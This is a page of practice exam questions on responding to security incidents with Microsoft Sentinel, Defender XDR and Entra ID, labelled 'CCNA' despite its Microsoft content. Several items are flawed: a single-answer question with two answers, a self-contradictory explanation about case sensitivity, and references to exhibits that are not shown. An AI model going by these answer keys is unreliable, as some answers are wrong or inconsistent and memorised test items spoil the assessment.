CCNA Respond Security Incidents Questions

75 of 489 questions · Page 3/7 · Respond Security Incidents topic

151 · MCQ · medium

Your organization uses Microsoft Defender for Cloud Apps and Microsoft Sentinel. An alert indicates that an external IP address is downloading large amounts of data from a SharePoint site containing confidential documents. The activity is coming from a valid user account that appears to be compromised. What should you do first to stop the data exfiltration?

A. Delete the confidential documents from SharePoint
B. Suspend the user account in Microsoft Entra ID
C. Block the external IP address in Microsoft Defender for Cloud Apps
D. Change the SharePoint site permissions to deny access
Answer: B

Suspending the account stops the download immediately.

Why this answer

Option B is correct because suspending the user account immediately stops the download. Option A is wrong because deleting files destroys evidence. Option C is wrong because blocking the IP may not be effective if the attacker uses multiple IPs. Option D is wrong because changing permissions is slower.

152 · MCQ · medium

During an incident response, you need to collect email messages from a user's mailbox in Microsoft 365 for evidence. The user is suspected of phishing. Which Microsoft Purview solution should you use?

A. eDiscovery (Standard)
B. Data Loss Prevention
C. Records Management
D. Audit (Standard)
Answer: A

eDiscovery allows searching and exporting mailbox content.

Why this answer

Option A is correct because eDiscovery (Standard) allows authorized users to search and export mailbox content, including email messages, for legal and investigative purposes. Option B is wrong because DLP is for data loss prevention, not collection. Option C is wrong because Records Management is for retention labels. Option D is wrong because Audit logs track activities, not content collection.

153 · MCQ · hard

The analyst notices that the rule does not fire for a user who has 12 sign-ins from the same IP address, but all are low risk. The expected behavior is to alert when a single user has more than 10 sign-ins from the same IP with at least one high-risk sign-in. What is the issue?

A. The join should be on UserPrincipalName only, not IPAddress.
B. The join should be leftouter to include sign-ins without high risk.
C. The threshold is set to 10, but the user has 12 sign-ins, so it should fire.
D. The query requires a high-risk sign-in from the same IP, but none exist, so no match.
Answer: D

The inner join only returns rows where a high-risk sign-in exists for that user and IP.

Why this answer

Option D is correct. The join requires high-risk sign-ins from the same IP, but the threshold only applies to the first aggregation. If all sign-ins are low risk, no high-risk join match occurs. Option A is wrong because the join is on both fields as intended. Option B is wrong because the join is inner as intended, which filters out non-matching rows. Option C is wrong because the threshold is 10 and is met, but the join condition is not.

154 · MCQ · easy

In Microsoft Sentinel, an incident is created from a Fusion rule that correlates multiple alerts. The incident has a high severity. What should the analyst do first?

A. Run an automated playbook to contain the threat
B. Close the incident as false positive
C. Triage the incident by reviewing the evidence
D. Escalate the incident to senior management
Answer: C

Triage confirms the validity and urgency.

Why this answer

Option C is correct because the first step in incident response within Microsoft Sentinel is to triage the incident by reviewing the evidence. A Fusion rule correlates multiple alerts into a single incident, and the analyst must examine the correlated alerts, entities, and timeline to validate the incident's legitimacy and understand the scope before taking any action. Automated playbooks or escalations should only occur after triage confirms the incident is a genuine threat.

Exam trap

The trap here is that candidates may assume a high-severity incident automatically requires immediate containment or escalation, but Microsoft Sentinel's incident response process mandates triage first to validate the correlation and avoid acting on false positives.

How to eliminate wrong answers

Option A is wrong because running an automated playbook to contain the threat should only occur after triage confirms the incident is a real threat; premature automation could disrupt legitimate operations or waste resources on a false positive. Option B is wrong because closing the incident as a false positive without reviewing the evidence violates the incident response process and could miss a genuine attack that the Fusion rule correctly identified. Option D is wrong because escalating to senior management is premature before triage; escalation should happen only after the analyst has assessed the incident's severity and impact.

155 · MCQ · easy

An incident in Microsoft Sentinel has been classified as a true positive. According to the incident response process, what should the analyst do next?

A. Contain the incident to prevent further damage.
B. Perform a root cause analysis.
C. Create a new analytic rule to detect similar activity.
D. Document the incident in a detailed report.
Answer: A

Containment is the immediate priority after confirming a true positive.

Why this answer

Option A is correct. After classification, the analyst should contain the threat to prevent further damage. Option B is done after containment. Option C is part of post-incident activities. Option D is part of post-incident reporting, not the next step.

156 · MCQ · hard

Refer to the exhibit. You are configuring an automation rule in Microsoft Sentinel. The rule triggers when an incident is created, changes its status to 'Active', assigns it to 'tier2', and runs a playbook. However, you notice that the playbook is not executing for incidents with severity 'Low'. What is the most likely reason?

A. The triggers array is empty, so no incidents trigger the rule.
B. The rule has a condition that filters out Low severity incidents.
C. The playbook is disabled in Microsoft Sentinel.
D. The severityFilter excludes incidents with severity 'Low'.
Answer: D

SeverityFilter only includes High and Medium.

Why this answer

Option D is correct because the severityFilter is set to 'High,Medium', so incidents with severity 'Low' are not processed by this automation rule. Option A is wrong because the triggers array is not empty. Option B is wrong because there is no condition blocking Low severity. Option C is wrong because nothing shows the playbook as disabled.

157 · MCQ · hard

An organization uses Microsoft Defender XDR. During an incident investigation, the security team needs to determine if a specific file was executed on any devices in the organization over the past 30 days. They have the file hash. What is the most efficient way to get this information?

A. Use the action center to search for the file
B. Use advanced hunting to query for file execution events
C. Review the incident timeline for the file
D. Check the device inventory for the file
Answer: B

Advanced hunting enables powerful KQL queries across device timelines.

Why this answer

Option B is correct because advanced hunting in Microsoft Defender XDR allows querying for file execution events across all devices using the file hash. Option A is wrong because the action center is for response actions, not queries. Option C is wrong because the incident timeline is for a specific incident, not a file search across devices. Option D is wrong because the device inventory does not show execution history.

158 · MCQ · hard

During an incident response, you need to collect a memory dump from a compromised Windows 10 device managed by Microsoft Defender for Endpoint. Which action should you take in the Microsoft Defender XDR portal?

A. Run a custom detection script
B. Initiate a Live Response session and run the 'memdump' command
C. Execute a Power Automate flow to collect memory
D. Start a full antivirus scan
E. Submit the device for automated investigation
Answer: B

Live Response provides a remote shell to run commands such as 'memdump'.

Why this answer

Live Response allows executing commands like collecting memory dumps. Running a PowerShell script or initiating a scan does not collect a memory dump. The other options are not available actions.

159 · Multi-Select · easy

Which TWO sources of evidence should a security analyst examine first when investigating a user-reported phishing email in Microsoft Defender XDR?

Select 2 answers
A. The email entity page
B. The action center
C. The user's mailbox audit log
D. The user's device timeline
E. Advanced hunting for email events
Answers: A, C

Email entity page contains key email details.

Why this answer

Options A and C are correct. Option A: The email entity page provides details about the email, including sender and links. Option C: The user's mailbox audit log shows if the user interacted with the email. Option B is wrong because the action center is for response. Option D is wrong because the device timeline is not relevant for email. Option E is wrong because advanced hunting is for complex queries, not a first step.

160 · Multi-Select · medium

Which THREE features in Microsoft Sentinel allow an analyst to automate incident response actions?

Select 3 answers
A. Playbooks (Logic Apps)
B. Watchlists
C. Workbooks
D. Automation rules
E. Analytics rules with incident automation
Answers: A, D, E

Playbooks perform complex automated workflows.

Why this answer

Automation rules, playbooks (Logic Apps), and analytics rules with automated responses are all automation features. Watchlists are for reference data, not automation. Workbooks are for visualization.

161 · MCQ · medium

Your company uses Microsoft Sentinel as its SIEM. You are investigating an incident where a user reported receiving a phishing email that appeared to come from the CEO requesting a wire transfer. The user did not respond. However, the incident also contains alerts from Microsoft Defender for Office 365 indicating that other users clicked on a malicious link in a similar email. The email was sent to 100 users. The company has Microsoft Defender for Endpoint deployed on all devices. The incident requires immediate containment to prevent further compromise. What should you do first?

A. Run a threat hunting query to find all users who clicked the link.
B. Block the malicious URL using Microsoft Defender for Cloud Apps.
C. Isolate the device of the user who reported the email.
D. Delete the email from all users' mailboxes using Microsoft 365 Defender.
Answer: B

Stops access to the URL across all devices.

Why this answer

Blocking the malicious URL in Defender for Cloud Apps or Defender for Endpoint prevents users from accessing it. Option A is a later step; Option C affects only the reporting user's device; Option D addresses the email but is not real-time.

162 · MCQ · hard

Your organization uses Microsoft Sentinel and Microsoft Defender for Cloud. During an incident, you need to automatically disable a compromised Azure VM from the network. Which playbook action should you use?

A. Apply an Azure Policy to deny network changes.
B. Create an Azure Firewall rule to block the VM's IP.
C. Add a rule to the VM's network security group to deny all traffic.
D. Remove the VM's role assignment from Azure RBAC.
Answer: C

NSG rules can isolate the VM from network traffic.

Why this answer

Option C is correct because you can use an Azure network security group to deny all inbound/outbound traffic to the VM. Option A is wrong because Azure Policy does not apply runtime network controls. Option B is wrong because Azure Firewall rules are not VM-specific. Option D is wrong because Azure RBAC does not affect network access.

163 · MCQ · medium

During an incident response, a security analyst identifies that a user's account was used to access sensitive data from an anomalous location. The analyst needs to immediately prevent further access from that account while preserving forensic data. Which action should the analyst take?

A. Revoke the user's current sessions in Microsoft Entra ID.
B. Block the IP address of the anomalous location in the firewall.
C. Disable the user account in Microsoft Entra ID.
D. Enable multi-factor authentication (MFA) for the user.
Answer: C

Disabling the account prevents all access and preserves data.

Why this answer

Disabling the user account in Microsoft Entra ID stops access immediately and preserves data. Option A only revokes sessions; Option B affects all users behind that IP address; Option D is too broad a response for immediate containment.

164 · MCQ · medium

Your organization uses Microsoft Defender for Endpoint. A user reports that their device is running slowly and exhibiting unusual network activity. You run a live response session and find a suspicious process running. Which action should you take first to contain the threat?

A. Collect a full memory dump for analysis.
B. Terminate the suspicious process.
C. Isolate the device from the network.
D. Add a firewall rule to block outbound traffic from the device.
Answer: C

Isolating the device prevents lateral movement and further damage.

Why this answer

Option C is correct because isolating the device immediately prevents the threat from spreading to other devices while you investigate further. Option A is wrong because collecting a memory dump does not contain the threat. Option B is wrong because terminating the process alone does not prevent re-execution. Option D is wrong because adding a firewall rule is too slow and may not block all lateral movement.

165 · MCQ · hard

During a ransomware investigation, a security analyst finds that multiple files on a file server have been encrypted. The server runs Microsoft Defender for Cloud and has been onboarded to Microsoft Sentinel. Which data source in Sentinel would provide the most granular information about the file encryption events?

A. Microsoft Defender for Cloud (Azure Defender) alerts
B. Azure Activity Log
C. Windows Security Events via MMA
D. Sysmon events via Azure Monitor Agent
Answer: A

Defender for Cloud can detect file encryption patterns and provide alerts with detailed process and file information.

Why this answer

Microsoft Defender for Cloud (formerly Azure Defender) provides file integrity monitoring and security events at the OS level. Sysmon via AMA would need specific configuration; Windows Security Events may not capture encryption; Azure Activity Log is for control plane events.

166 · MCQ · medium

You are responding to a data exfiltration incident involving a user who copied sensitive files to a personal cloud storage service. The files were accessed from the user's managed device. Which Microsoft Defender for Cloud Apps activity policy should you create to detect similar future incidents?

A. An anomaly detection policy that flags impossible travel.
B. An activity policy that detects uploads to personal cloud storage services.
C. A file policy that detects files shared with external users.
D. An app discovery policy that identifies new cloud apps used in the organization.
Answer: B

Activity policies monitor specific activities like file uploads to non-corporate apps.

Why this answer

Option B is correct because an activity policy can monitor file uploads to non-corporate cloud apps. Option A is wrong because an anomaly detection policy is for unusual behavior, not specific uploads. Option C is wrong because a file policy applies to files already in cloud apps. Option D is wrong because an app discovery policy identifies shadow IT apps, not specific activities.

167 · MCQ · easy

You are investigating a ransomware incident in Microsoft Sentinel. The incident contains multiple alerts. You need to group related alerts under the same incident to reduce alert fatigue. What should you do?

A. Enable User and Entity Behavior Analytics (UEBA).
B. Create a new analytics rule to combine alerts.
C. Use an automation rule to merge incidents.
D. Configure incident creation rules in the analytics rule.
Answer: D

Incident creation rules allow grouping alerts into incidents based on entities.

Why this answer

Option D is correct because incident creation rules in Sentinel automatically group alerts by entities and time window. Option A is wrong because entity behavior analytics is a separate feature. Option B is wrong because analytics rules create alerts, not incidents. Option C is wrong because automation rules trigger playbooks, not grouping.

168 · Multi-Select · medium

Which TWO of the following are valid response actions that can be taken on a device from Microsoft Defender for Endpoint? (Choose two.)

Select 2 answers
A. Quarantine email
B. Disable user account
C. Run antivirus scan
D. Reset user password
E. Isolate device from network
Answers: C, E

Running antivirus scan is a standard response action.

Why this answer

The correct answers are C and E. Isolation and Run antivirus scan are standard device response actions. Option A is wrong because quarantining an email is a Microsoft 365 Defender action. Option B is wrong because disabling the user is an identity action. Option D is wrong because password reset is not a device action.

169 · MCQ · medium

During an incident response, you identify that a user's account was used to sign in from an unusual location. You need to contain the incident immediately. What should you do first?

A. Reset the user's password.
B. Disable the user account in Microsoft Entra ID.
C. Revoke the user's refresh tokens.
D. Create a Conditional Access policy to block the user.
Answer: B

Disabling the account immediately stops all sign-ins, containing the incident.

Why this answer

Option B is correct because disabling the user account in Microsoft Entra ID is the fastest way to stop all sign-ins, containing the incident. Option A is wrong because resetting the password alone does not prevent the attacker from using existing tokens. Option C is wrong because revoking tokens does not block future sign-ins. Option D is wrong because Conditional Access policies cannot block a specific user instantly.

170 · Multi-Select · easy

Which TWO are immediate containment actions in Microsoft Sentinel for a compromised Azure VM? (Choose two.)

Select 2 answers
A. Install anti-malware extension
B. Apply an NSG to block all inbound and outbound traffic
C. Reset the VM administrator password
D. Initiate a VM backup
E. Stop the VM using an automation rule
Answers: B, E

NSG blocks network communication immediately.

Why this answer

Option B is correct: applying a network security group (NSG) to block traffic can be automated via playbook. Option E is correct: stopping the VM prevents further malicious activity. Option A is wrong because VM extensions may not stop the attack. Option C is wrong because resetting the password does not stop processes. Option D is wrong because initiating a backup is not containment.

171 · MCQ · hard

You are responding to a data exfiltration incident in Microsoft Sentinel. The attacker used a PowerShell script to upload data to an external storage account. You need to identify the specific storage account used. Which KQL query should you use in the AzureActivity table?

A. OperationName == 'Get Storage Account Properties'
B. OperationName == 'Storage Blob Upload'
C. OperationName == 'Create or Update Storage Account'
D. OperationName == 'List Storage Account Keys'
Answer: B

Storage Blob Upload is the operation that corresponds to uploading data to a blob.

Why this answer

Option B is correct because Storage Blob Upload is the operation for uploading data. Option A is wrong because Get Storage Account Properties is read-only. Option C is wrong because Create or Update Storage Account is for provisioning. Option D is wrong because List Storage Account Keys is for managing storage account keys.

172 · MCQ · hard

A SOC team uses Microsoft Sentinel with Microsoft Defender XDR integration. An incident is created from a Defender for Endpoint alert. The analyst wants to run a KQL query across all affected devices without creating a new analytics rule. How can the analyst achieve this?

A. Modify the analytics rule that created the incident.
B. Use the incident's Logs blade to run a KQL query.
C. Use the Microsoft Sentinel Hunting blade.
D. Create a new workbook.
Answer: B

Logs blade allows ad-hoc querying within the incident context.

Why this answer

Option B is correct because the incident's Logs blade allows running ad-hoc KQL queries. Option A is wrong because the analytics rule is for scheduled queries. Option C is wrong because the hunting blade is for proactive hunting, not incident-specific investigation. Option D is wrong because the workbook is for visualizations.

173 · Multi-Select · hard

Which THREE elements are required to create a custom detection rule in Microsoft Sentinel?

Select 3 answers
A. An alert threshold
B. A KQL query
C. Entity mapping for incident creation
D. An automation playbook
E. A schedule for the query
Answers: B, C, E

The query defines the detection logic.

Why this answer

A custom detection rule requires a KQL query to define logic, a schedule to run the query, and entity mapping to link results to incidents. Alert threshold is optional; playbook is separate.

174 · MCQ · hard

An administrator creates a Microsoft Defender for Cloud Apps policy to block unsanctioned cloud storage apps. Despite the policy, users can still access these apps. What is the most likely cause?

A. The action type 'Block' is incorrect; it should be 'Alert'
B. The policy requires a 'Device' filter to apply to all users
C. The filter uses 'Unsanctioned' tag, but apps are tagged 'Sanctioned'
D. The policy mode is set to 'Monitor', which only alerts and does not block
Answer: D

Monitor mode doesn't enforce actions; it must be set to 'Block' or 'Govern'.

Why this answer

The policy mode is set to 'Monitor' instead of 'Govern' or 'Block'. In Microsoft Defender for Cloud Apps, policies in 'Monitor' mode only generate alerts; they do not block. The action 'Block' is defined, but the policy mode must be set to 'Block' or 'Govern' to enforce it. The filter and actions are correct.

175 · MCQ · medium

You are reviewing an alert rule in Microsoft Sentinel created via ARM template. What is the primary purpose of this rule?

A. To send an alert when a sign-in with high risk level is detected.
B. To isolate the user's device from the network.
C. To automatically block the user from signing in.
D. To create an incident in Microsoft Sentinel.
Answer: A

The rule triggers on high risk sign-ins and sends an alert via the action group.

Why this answer

Option A is correct because the rule triggers when a sign-in risk level is high, sending an alert to an action group. Option B is wrong because it does not isolate devices. Option C is wrong because it does not block the user. Option D is wrong because it creates an alert, not an incident directly.

176 · Multi-Select · medium

Which TWO tools in Microsoft Defender XDR provide automated investigation and response capabilities?

Select 2 answers
A. Microsoft Defender for Endpoint
B. Microsoft Defender for Office 365
C. Microsoft Defender for Identity
D. Microsoft Defender for Cloud Apps
E. Microsoft Defender for Cloud
Answers: A, B

Defender for Endpoint includes AIR for endpoint incidents.

Why this answer

Automated investigation and response (AIR) is available in Defender for Office 365 and Defender for Endpoint. Defender for Identity and Defender for Cloud Apps have some automation but not full AIR. Defender for Cloud is separate.

177 · MCQ · hard

An organization uses Microsoft Sentinel with the Microsoft Defender XDR connector. An incident is generated for a user who is suspected of being compromised. The analyst wants to automatically block the user's sign-ins using a playbook. Which connector should the playbook use?

A. Microsoft Sentinel connector
B. Microsoft 365 Defender connector
C. Microsoft Entra ID connector
D. Microsoft Teams connector
Answer: C

The Microsoft Entra ID connector (Azure AD) can perform actions such as blocking user sign-ins or revoking sessions.

Why this answer

The Microsoft Entra ID (Azure AD) connector allows updating user risk or disabling the account. Microsoft 365 Defender is for alerts; Teams is for notifications; the Sentinel connector is for ingestion.

178 · MCQ · easy

A SOC analyst needs to investigate a potential data exfiltration incident involving a user uploading files to an external cloud storage service. Which Microsoft Sentinel data source would provide the MOST relevant information?

A. SigninLogs
B. CommonSecurityLog
C. AzureActivity
D. OfficeActivity
Answer: D

Tracks file operations in SharePoint and OneDrive.

Why this answer

Option D is correct because OfficeActivity includes SharePoint and OneDrive audit logs, which track file uploads. Option A is wrong because SigninLogs only shows sign-ins. Option B is wrong because CommonSecurityLog is for firewall logs, not file uploads. Option C is wrong because AzureActivity tracks Azure resource actions, not file uploads.

179 · MCQ · medium

Refer to the exhibit. You are reviewing a Microsoft Sentinel scheduled analytics rule configured as above. An incident was created for multiple alerts triggering within a 5-hour window. The SOC team needs to investigate each alert separately because they involve different user accounts. What should the analyst do to ensure each alert generates a separate incident?

A. Change the matchingMethod to 'AnyAlert'.
B. Set 'enabled' to false under groupingConfiguration.
C. Set 'reopenClosedIncident' to true.
D. Change the lookbackDuration to PT0H.
Answer: B

Disabling grouping ensures each alert creates a new incident.

Why this answer

Option B is correct because setting 'enabled' to false under groupingConfiguration disables grouping, so each alert becomes its own incident. Option A is wrong because the matchingMethod is already 'AllEntities', and changing it does not turn grouping off. Option C is wrong because 'reopenClosedIncident' is for reopening, not for separating alerts. Option D is wrong because changing the lookbackDuration only changes the grouping window; increasing it would group more alerts.

180 · Multi-Select · hard

Which THREE data sources in Microsoft Sentinel can be used to detect lateral movement in a network? (Choose three.)

Select 3 answers
A. DNS logs
B. Microsoft Defender for Endpoint (device events)
C. Windows Event Logs (Event ID 5140)
D. Windows Security Events (Event ID 4624)
E. Microsoft Entra ID sign-in logs
Answers: B, C, D

Defender for Endpoint provides process creation and network connections that can reveal lateral movement.

Why this answer

B, C, and D are correct. Microsoft Defender for Endpoint provides process and network connection events. Windows Event Logs (Event ID 5140) show network share accesses. Windows Security Events (Event ID 4624) show logon attempts. A is wrong because DNS logs may show name resolution but not direct lateral movement evidence. E is wrong because Microsoft Entra ID (Azure AD) sign-in logs are for cloud authentication, not lateral movement.

181 · Multi-Select · hard

During a ransomware incident, Microsoft Defender for Cloud Apps alerts indicate that a user is uploading large volumes of data to an external cloud storage provider not approved by your organization. Which two actions should you take first? (Choose two.)

Select 2 answers
A. Block the unapproved cloud storage app
B. Suspend the user's account
C. Notify the user about the policy violation
D. Initiate a legal hold on the user's data
Answers: A, B

Blocking the app prevents further uploads.

Why this answer

The immediate actions are to suspend the user's access to prevent further data exfiltration and block the unapproved app to stop data uploads. Initiating a legal hold and notifying the user are later steps.

182 · MCQ · medium

An incident in Microsoft Defender XDR involves a device that is suspected to be infected with ransomware. The device is online and actively encrypting files. Which action should you take to contain the threat?

A. Isolate the device from the network
B. Disable the user's account
C. Run a full antivirus scan on the device
D. Collect a memory dump from the device
Answer: A

Isolation prevents further spread and encryption.

Why this answer

The immediate containment action is to isolate the device from the network to stop lateral movement and encryption. Running antivirus or collecting forensic data is secondary. Disabling the user account does not stop the device.

183 · MCQ · medium

Based on the ARM template snippet, what is the purpose of this analytics rule?

A. To detect multiple failed logon attempts within a time window
B. To detect brute force attacks on user accounts
C. To detect successful logins by account
D. To detect account lockouts
Answer: A, B

The rule alerts when failed logon count exceeds 5.

Why this answer

Options A and B are correct because the query counts failed logon events (EventID 4625) within the time window and triggers when the count exceeds 5, indicating brute force attempts. Option C is wrong because EventID 4625 is a failed logon, not a success. Option D is wrong because the query does not check for account lockouts; it does not include the additional event IDs that would require.

184 · MCQ · hard

During an incident response, a SOC analyst identifies that a malicious PowerShell script was executed on multiple endpoints. The analyst needs to collect relevant files from all affected endpoints for further analysis. What should the analyst use?

A. Microsoft Defender for Cloud Apps file investigation.
B. Microsoft Purview eDiscovery.
C. Microsoft Defender for Endpoint Live Response.
D. Microsoft Sentinel incident investigation graph.
Answer: C

Live Response allows remote file collection from endpoints.

Why this answer

Option C is correct because Microsoft Defender for Endpoint's Live Response allows collecting files from endpoints. Option A is wrong because Microsoft Defender for Cloud Apps does not collect files from endpoints. Option B is wrong because Microsoft Purview is for compliance. Option D is wrong because Microsoft Sentinel is for SIEM, not live file collection.

185 · MCQ · medium

Refer to the exhibit. A SOC analyst runs this KQL query in Microsoft Sentinel to investigate devices in the finance subnet. Which result would indicate that a device might be compromised?

A. A device with multiple connected networks, including an external IP.
B. A device named 'finance-server-01' with a single network connection.
C. A device with no network connections in the last 7 days.
D. A device with a LocalIPAddress starting with 10.0.0.
Answer: A

Multiple networks, especially including external, could indicate compromise.

Why this answer

The correct answer is A. A device with multiple connected networks, especially if those networks are unusual (e.g., a finance device connecting to external networks), could indicate lateral movement or command and control. The other options are not inherently suspicious.

186 · MCQ · hard

Refer to the exhibit. An analyst runs the query to identify the top 10 entities with the most malware alerts. However, the query returns no results. What is the most likely reason?

A. The SecurityAlert table does not contain the AlertName field.
B. The AlertName field does not contain the substring 'Malware' (case-sensitive issue).
C. The 'has' operator requires an exact match.
D. The 'take 10' operator returns no results because there are fewer than 10 alerts.
Answer: B

The 'has' operator is case-insensitive, but the substring might be different.

Why this answer

Option B is correct because the query uses 'has' which is case-insensitive, but 'Malware' may not be the exact substring in the AlertName field. Option A is wrong because the query uses SecurityAlert table, which is correct. Option C is wrong because 'has' works on strings, not just exact matches.

Option D is wrong because 'take 10' limits results, but would not cause zero results.

187 · MCQ · easy

You receive an incident in Microsoft Sentinel that is a low-confidence alert from Microsoft Defender for Identity. What should be your first step?

A. Investigate the alert by reviewing related entities and logs.
B. Close the incident as a false positive.
C. Escalate to senior management.
D. Isolate the affected account immediately.
Answer: A

Investigation determines if the alert is a true positive before taking action.

Why this answer

Option A is correct. The analyst should first investigate to determine if the alert is a true positive. Option B is premature without investigation.

Option C is a post-investigation step. Option D is not appropriate for a low-confidence alert.

188
MCQeasy

You have been tasked with creating an automated response in Microsoft Sentinel for incidents involving lateral movement. Which Azure service allows you to run a playbook to automatically isolate a compromised VM?

A.Azure Logic Apps
B.Kusto Query Language (KQL)
C.Microsoft Defender XDR advanced hunting
D.Azure Event Hubs
AnswerA

Playbooks in Sentinel are implemented as Logic Apps workflows.

Why this answer

Option A is correct because Microsoft Sentinel playbooks are Azure Logic Apps workflows, and a playbook can call the Defender for Endpoint connector to isolate a machine. Option B is a query language, not an automation service. Option C is a query environment for hunting across Defender XDR data, not a way to run response actions.

Option D is an event streaming service used to export or ingest data, not to run playbooks.

189
Multi-Selecthard

Which TWO remediation actions are available in Microsoft Defender for Endpoint when responding to a malware infection?

Select 2 answers
A.Run a full antivirus scan
B.Disable the user account
C.Reset the device to factory settings
D.Block the application in Defender for Cloud Apps
E.Isolate the device from the network
AnswersA, E

Both actions are launched from the device page in the Microsoft Defender portal.

Why this answer

Option A is correct because Defender for Endpoint can start an antivirus scan on a device from the portal. Option E is correct because network isolation is the standard containment action: the device keeps its connection to the Defender service but loses all other network access. Option B is wrong because accounts are disabled in Microsoft Entra ID or Active Directory, not in Defender for Endpoint.

Option C is wrong because a factory reset is not a Defender for Endpoint response action and would destroy the evidence the investigation needs. Option D is wrong because blocking an application in Defender for Cloud Apps governs cloud app access, not malware on the endpoint.

190
MCQhard

Your organization uses Microsoft Sentinel with UEBA (User and Entity Behavior Analytics). An alert indicates a user's sign-in from an unusual location, followed by a mass download of sensitive files from SharePoint. The user is a low-privilege employee. What is the most likely conclusion?

A.The user's account is compromised
B.The alert is a false positive due to user travel
C.The user is an insider threat
D.The user is conducting a ransomware attack
AnswerA

Unusual location and anomalous data access strongly indicate compromise.

Why this answer

The combination of unusual location and mass download of sensitive files by a low-privilege user suggests account compromise. It is not necessarily ransomware or a false positive, and insider threat is less likely without evidence of intent.

191
Multi-Selecthard

Which THREE data sources should be included in a Microsoft Sentinel workspace to comprehensively monitor for lateral movement within an Azure environment?

Select 3 answers
A.Azure AD sign-in logs
B.Power BI audit logs
C.Azure Network Security Group flow logs
D.Azure DevOps audit logs
E.Azure Activity logs
AnswersA, C, E

Sign-in logs reveal authentication attempts from compromised accounts.

Why this answer

Options A, C and E are correct because together they cover the identity (sign-in logs), network (NSG flow logs) and control-plane (Activity logs, which record resource management operations such as creating a VM or changing an NSG) aspects of lateral movement. Option B is wrong because Power BI audit logs record report usage, not movement between resources. Option D is wrong because Azure DevOps audit logs cover the development pipeline, not runtime activity in the environment.

192
MCQhard

Your organization uses Microsoft Sentinel and Microsoft Defender for Cloud Apps. You receive a high-severity incident indicating that a user's credentials were used to access a sensitive SharePoint site from an unmanaged device. The user, 'jdoe@contoso.com', is a senior executive. The IP address is from a public Wi-Fi hotspot. The incident includes a recommendation to apply session policy to block download of sensitive files. You need to create a policy in Microsoft Defender for Cloud Apps that blocks downloads from unmanaged devices for this specific user when accessing the sensitive site. The policy should trigger only when the user accesses the specific SharePoint site named 'ExecConfidential'. What should you do?

A.Create an app connector for SharePoint and a session policy that targets the user, site, and device tag 'Unmanaged' with the action 'Block download'.
B.Create a device compliance policy in Microsoft Intune to block unmanaged devices from accessing SharePoint.
C.Create a Conditional Access policy in Microsoft Entra ID to require compliant device for the SharePoint site.
D.Create a file policy in Defender for Cloud Apps to quarantine files downloaded from the site.
AnswerA

Session policies in Defender for Cloud Apps can block specific in-session actions, such as download, for unmanaged devices.

Why this answer

Option A is correct because a session policy scoped to the user, the 'ExecConfidential' site and the 'Unmanaged' device tag with the action 'Block download' meets every requirement in the scenario. In practice the session also has to be routed through Defender for Cloud Apps by a Conditional Access policy that uses Conditional Access App Control; the app connector on its own only provides API-based visibility. Option B is wrong because an Intune compliance policy is not a Defender for Cloud Apps policy and cannot block a single action such as download. Option C is wrong because a Conditional Access policy can require a compliant device or hand the session to Defender for Cloud Apps, but it does not itself block downloads for one user on one site.

Option D is wrong because a file policy acts on files at rest (for example quarantining shared files), not on what a user does during a session.

193
MCQmedium

Your organization has Microsoft Defender for Endpoint deployed. A security analyst receives an alert about a suspicious PowerShell command executed on a device. The analyst needs to investigate the process tree. Which feature should the analyst use?

A.Device isolation
B.Live response
C.Timeline (process timeline)
D.Advanced hunting
AnswerC

Timeline shows process tree and events.

Why this answer

The correct answer is C because the device timeline in Defender for Endpoint shows the parent-child process tree with the events around the suspicious execution, including the full command line. Option A is wrong because device isolation is a containment action, not an investigation view. Option B is wrong because live response is for running commands and collecting files from the device remotely.

Option D is wrong because advanced hunting is a KQL query interface; it can return the same DeviceProcessEvents rows, but not as a visual process tree.

194
Multi-Selecthard

Which TWO actions should be taken to respond to a potential data exfiltration incident detected by Microsoft Defender for Cloud Apps?

Select 2 answers
A.Block the IP address of the user's device at the firewall.
B.Suspend the user account in Microsoft Entra ID.
C.Report the user to Microsoft for investigation.
D.Revoke all active sessions for the user in Defender for Cloud Apps.
E.Run a full antivirus scan on the user's device.
AnswersB, D

Suspending the account stops the user from accessing any cloud apps immediately.

Why this answer

Suspending the user account and revoking active sessions are immediate containment actions that stop further access by whoever holds the credentials. Blocking an IP address is useful but insufficient, because a compromised account can be used from any address. Reporting the user to Microsoft is not a containment step.

Running a full antivirus scan addresses the endpoint, not exfiltration that is happening inside the cloud app.

195
MCQmedium

During an incident investigation in Microsoft Sentinel, you need to gather related events from multiple data sources into a single view for analysis. Which feature should you use?

A.Workbooks
B.Investigation graph
C.Watchlists
D.Logs blade
E.Analytics rules
AnswerB

Provides a visual map of entities and related data.

Why this answer

The Investigation graph in Microsoft Sentinel is specifically designed to visually correlate and explore related entities and events across multiple data sources within a single investigation. It allows you to pivot from an alert or entity to see connected users, hosts, IP addresses, and other events, providing a unified view for analysis. This feature directly addresses the need to gather related events from disparate sources into one cohesive view during incident response.

Exam trap

The trap here is that candidates often confuse the Investigation graph with Workbooks or the Logs blade, mistakenly thinking that any visualization or query tool can serve the same purpose, but the Investigation graph is the only feature purpose-built for interactive, entity-centric incident exploration in Sentinel.

How to eliminate wrong answers

Option A is wrong because Workbooks are used for creating custom dashboards and reports for visualizing data trends, not for interactive, entity-based incident investigation. Option C is wrong because Watchlists are static collections of data (e.g., IP addresses or hashes) used for correlation or enrichment in queries, not for dynamic event gathering across sources. Option D is wrong because the Logs blade is a query interface for running KQL queries against raw log data, but it does not provide a built-in, visual entity relationship view for incident investigation.

Option E is wrong because Analytics rules are used to create detection logic that generates alerts, not to investigate or correlate events after an alert has been triggered.

196
Multi-Selecthard

Which THREE steps are part of the containment phase of incident response in Microsoft Sentinel? (Select THREE.)

Select 3 answers
A.Disable compromised user accounts in Microsoft Entra ID.
B.Isolate affected devices using Microsoft Defender for Endpoint.
C.Collect forensic data from affected endpoints.
D.Block malicious IP addresses and domains in Microsoft Defender for Cloud Apps.
E.Restore encrypted files from backup.
AnswersA, B, D

Disabling accounts stops further misuse.

Why this answer

Option A is correct because disabling compromised accounts stops further unauthorized access. Option B is correct because isolating affected devices prevents further damage and lateral movement. Option D is correct because blocking known malicious indicators stops the attacker's infrastructure from being reached.

Option C is wrong because collecting forensic data is part of investigation, not containment. Option E is wrong because restoring from backup is part of recovery.

197
Multi-Selecteasy

Which TWO actions should be taken immediately when a compromised user account is detected in Microsoft Entra ID?

Select 2 answers
A.Revoke all current sessions.
B.Notify the user's manager.
C.Disable the user account.
D.Reset the user's password.
E.Block sign-ins from the user's IP address.
AnswersA, C

Terminates active sessions.

Why this answer

